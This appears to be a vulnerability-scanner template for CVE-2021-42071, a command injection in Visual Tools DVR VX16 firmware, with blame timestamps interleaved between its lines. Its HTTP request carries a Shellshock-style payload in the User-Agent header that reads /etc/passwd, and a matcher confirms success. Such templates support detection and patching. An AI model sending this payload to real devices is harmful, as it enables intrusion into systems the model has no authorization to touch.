2022-04-07 13:53:15 +00:00
id : CVE-2021-42071
2021-07-22 23:47:29 +00:00
info :
2022-04-15 16:39:44 +00:00
name : Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
2021-07-22 23:47:29 +00:00
author : gy741
severity : critical
2022-04-07 13:53:15 +00:00
description : Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 23:47:29 +00:00
- https://www.exploit-db.com/exploits/50098
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-42071
2022-05-17 09:18:12 +00:00
- https://visual-tools.com/
2022-04-07 13:53:15 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-04-07 13:53:15 +00:00
cve-id : CVE-2021-42071
2022-05-17 09:18:12 +00:00
cwe-id : CWE-78
2023-10-14 11:27:55 +00:00
epss-score : 0.95761
2023-11-09 06:04:52 +00:00
epss-percentile : 0.99262
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : visual-tools
product : dvr_vx16_firmware
tags : edb,cve,cve2021,visualtools,rce,oast,injection
2022-04-15 16:39:44 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 23:47:29 +00:00
- raw :
- |
GET /cgi-bin/slogin/login.py HTTP/1.1
Host : {{Hostname}}
Accept : */*
User-Agent : () { :; }; echo ; echo ; /bin/cat /etc/passwd
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-22 23:47:29 +00:00
- type : status
status :
- 200
2023-11-09 10:11:53 +00:00
# digest: 490a0046304402200b821747506a033aea71e871b6b415810b07d0e92128ee9947cc2f77e9dc54e402204d82d9a47f70ee69d3b10e082baebce82d8b3137f9479811e034f6cf6e40cca8:922c64590222798bb761d5b6d8e72950